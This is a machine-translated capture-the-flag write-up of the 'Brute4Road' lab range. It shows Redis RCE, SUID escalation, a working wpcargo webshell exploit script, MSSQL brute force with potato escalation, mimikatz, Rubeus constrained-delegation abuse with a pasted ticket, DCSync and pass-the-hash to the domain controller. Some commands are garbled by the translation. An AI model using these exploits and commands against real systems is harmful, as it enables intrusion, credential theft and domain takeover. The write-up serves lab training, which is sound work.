Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Brute4Road writeup

Instructions

Brute4Road is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and horizontal movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 4 flags in the shooting range, distributed in different target machines.

Technology

Redis, Brute Force, SMB, Privilege Elevation, Domain Penetration

First flag

redis master-slave copy RCE

fscan scan the entrance ip. If the following entrance ip changes, it is because of the restart environment, there is no problem with the process.

Unauthorized redis was found, and the write plan task rebounded shell was tested. It prompted that there was no permission. The redis master-slave copy RCE successfully

suid escalation

The user needs to raise the rights for redis. Use suid to raise the rights. You can execute the following command. For details, you can view suid to raise the rights for Linux system 1

find/-user root -perm -4000 -print 2/dev/null

find/-perm -u=s -type f 2/dev/null

find/-user root -perm -4000 -exec ls -ldb {} ;base64 has suid permission. We can read the local file through base64 and output it to get the first flag

base64 '/home/redis/flag/flag01' | base64 --decode

The second flag

wpcargo unauthorized RCE

Set up a proxy on the server of the portal IP, and perform intranet scanning, upload npc and fscan through weget

start ping

(icmp) Target 172.22.2.18 is alive

(icmp) Target 172.22.2.34 is alive

(icmp) Target 172.22.2.3 is alive

(icmp) Target 172.22.2.7 is alive

(icmp) Target 172.22.2.16 is alive

[*] Icmp alive hosts len is: 5

172.22.2.16:445 open

172.22.2.34:445 open

172.22.2.3:445 open

172.22.2.18:445 open

172.22.2.16:139 open

172.22.2.34:139 open

172.22.2.3:139 open

172.22.2.34:135 open

172.22.2.16:135 open

172.22.2.18:139 open

172.22.2.3:135 open

172.22.2.16:80 open

172.22.2.3:88 open

172.22.2.18:22 open

172.22.2.7:80 open

172.22.2.7:22 open

172.22.2.7:6379 open

172.22.2.16:1433 open

172.22.2.7:21 open

172.22.2.18:80 open

[*] alive ports len is: 20

start vulscan

[+] NetInfo:

[*]172.22.2.16

[-]MSSQLSERVER

[-]172.22.2.16

[*] 172.22.2.34 XIAORANG\CLIENT01

[*] 172.22.2.16 (Windows Server 2016 Datacenter 14393)

[+] NetInfo:

[*]172.22.2.3

[-]DC

[-]172.22.2.3

[*] WebTitle:http://172.22.2.16 code:404 len:315 title:Not Found

[+] NetInfo:

[*]172.22.2.34

[-]CLIENT01

[-]172.22.2.34

[*] WebTitle:http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS

[*] 172.22.2.16 XIAORANG\MSSQLSERVER Windows Server 2016 Datacenter 14393

[*] 172.22.2.3 [+]DC XIAORANG\DC Windows Server 2016 Datacenter 14393

[*] 172.22.2.18 WORKGROUP\UBUNTU-WEB02

[*] 172.22.2.3 (Windows Server 2016 Datacenter 14393)

[+] ftp://172.22.2.7:21:anonymous

[-]pub

[*] WebTitle:http://172.22.2.18 code:200 len:57738 title: Another WordPress site uses wpscan to scan the wordpress site

proxychains wpscan --url http://172.22.2.18 You can see that there is a wpcargo plug-in, search for related vulnerabilities, and there is an unauthorized RCE vulnerability

https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

import sys

import binascii

import requests

# This is a magic string that when treated as pixels and compressed using the png

# algorithm, will cause ?=$_GET[1]($_POST[2]); to be written to the png file

payload='2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):

return '{:08b}'.format(c).replace('0', 'x')

text=''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url='http://172.22.2.18/'

cmd='ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.

requests.get(

f'{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}sizefactor=.09090909090909size=1filepath=/var/www/html/webshell.php'

)

# We have uploaded a webshell - now let's use it to execute a command.

print(requests.post(

f'{destination_url}webshell.php?1=system', data={'2': cmd}

).content.decode('ascii', 'ignore')) generates shell

http://172.22.2.18/webshell.php?1=system

POST:2=whoami Connect to the ant sword, pay attention to the type and choose cmdLinux (This wastes a lot of time and is not familiar with the tools)

View the database configuration and connect

Find the second flag

The third flag

A table for storing passwords

MSSqlServer RCE

Use the password table you just got in the database to blast MsSQL and get the password ElGNkOiC

Connect using the Multiple.Database.Utilization.Tools tool

First activate the Ole Automation Procedures component, then upload SweetPotato.exe to increase the authority, and obtain system permissions

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a 'netstat -ano' Discover 3389 is open, directly add users, remote connection

net user devyn Admin123 /add

net localgroup administrators devyn /add Remote connection is successful

Get the third flag

‍The fourth flag

Domain Penetration

Using mimikatz, crawl the hash of the domain user

The hash obtained from the domain user is 78a2811aabd779d0da3cef84903ca3e6

Constrained delegation attacks

The MSSQLSERVER machine is configured with binding delegation to DC LDAP and CIFS services

First apply for TGT of the machine account MSSQLSERVER through Rubeus. After execution, you will get the Base64 encrypted TGT ticket.

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:78a2811aabd779d0da3cef84903ca3e6 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap Then use the S4U2Self extension to represent the domain administrator Administrator to request tickets for the domain control LDAP service and pass the resulting tickets to memory

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3jomeuPBK3C69yaGuyDCLGYHRyVjZg4zXrEwUSwvFS0kZ+4Q2uTcKGqYw3GLs5sf0/MJ0fHiL1V 8u5WrLpgR5hBlYUGN+g1zmv3uiTXO7QobxH0lR0dUUKuNdPoxdPdx26Liz5/xdDFvz4xTyMKDqqRxgBWquqGjh1cp/woy4U4tXJo+L8CfQ424Kgdb3n/rJYRNY54m8QHl/smHg3PpMgTT2FEiJ5Jag+qDpM/R/XUOIJHNzSfCVi2XiLGqPF374jUbih9UTZvlqRoSHz9qljZlBsEAqen9ctu01tmNn4ACRz4mqMV11MyV9scfe JnQbCpGdS+zveSrT53dwFotrg00o4Jq6RGr9dR/6ZMKC1W/kfwSXdF1b/H3HOMM7HzK0qLfSbDtq8i1e2FdZ5kyOVbbtAE6irAizzK7ScDS4rO9RRSDl6BNaV25nkjce6j9dj4V56ua1Gh+F+JQfAHbE8zLNt9OmseJs6IGj/cxKEckbhcggGhQhL3c6k1FKZOTXY1PKR8zweZauWgK7FXiDLEP1h6YwP2S/frDmKRb5mCdBU UQBzsA/6BBmEAnxvfKX1B8xViT0rq1I/pLKS9LKWTKyuHJd67z6XDRN7IWR0fstyqGuvHPn391l02zNUJRK5/7jyOyKwhQ3sb/XRzC4YbLeGgImMGRZ0fqrQ+hRBQbTuNr2/i4hgyWDLuBSEvz5qb1kXcebRkWuCHhpGKtsdbyZ30tnpA0W2qWu8qJ8zKks04r2Hj91lCPudAbrjhjjFf/UNd+fHcfYlAu0xzMuR8eKUA22Lcv 0fEf2igvIu38bCRvUjfGkh423fgPsR4Xom8/8lNWhU+kaAiGSwSER8UGr8jiDVjtmgF5ScFoQDM+kVJ5o0ZnettUHJhcVMAdlI1QTq5WjQRIea6u4d6bYSHI43ips6So8hEcsB/03FpOKR/SRUYveALw3IAwAJtAPtW/SrzUeLXEemVg2aADTl1qXNw04A0e9v8XQnnm7lyCJfmI3pXJVsycjJyviDwazFtHGbQoM3fhlZ4zp BlfBKagxQr624YO5yIaJbl9/Dp4M7iauUIbo7kAWCfka1iafKyGDFGAXudAb52dt72jw0/QpeLP08RORDLtY8IrpjKAzHsSGuVYukY07lR+ck95MeKFDnl8cwaKw0MB8f92n4g4OfWQbUJK/479LYMZBDG38iwHHv/MLiaCylHm5nazaY0JJxJ2CeqIvsAFlfm7gp23V5Hj/T+eKt0zd3EIjNhuwBvhYeVKKQCFJZGaRelQKxa ptmKhhgILA+wTKvCxpQX6qx8b40pg9r1rr4zQ9buPb4JNnqwHe5SIgPURR02Xv5FUiiI9Qc5//bUhxCEOXi0TFASRbghAyNA/TLRVAqfvtgqv6SKb4jw265bdrQQrPITm1En79jsNw6adH1curFJr++PS6ZYX6yqK3DlJ5Piiy2OAVLPIPcN1zmbZ+jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6 ESBBBAXgLFznI5hHEOCpAjFdNEoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIyMTAyODEyMjIzM1qmERgPMjAyMjEwMjgyMjIyMzNapxEYDzIwMjIxMTA0MTIyMjMzWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg== The LDAP service has DCSync permissions to export the Hash of users in the domain

mimikatz.exe 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit Get domain administrator hash 1a19251fbd935969832616366ae3fe62

WMI horizontal

After obtaining the hash of the domain management, we can log in to the domain control through the WMI service.

python wmiexec.py -hashes 00000000000000000000000000000000000000000000:1a19251fbd935969832616366ae3fe62 [email protected] Get the fourth flag

Another method

You can get the domain control directly by hashing. Here you use crackmapexec to perform PTH

proxychains crackmapexec smb 172.22.2.3 -u administrator -H1a19251fbd935969832616366ae3fe62 -d xiaorang.lab -x 'type Users\Administrator\flag\flag04.txt' Original link: https://zhuanlan.zhihu.com/p/581577873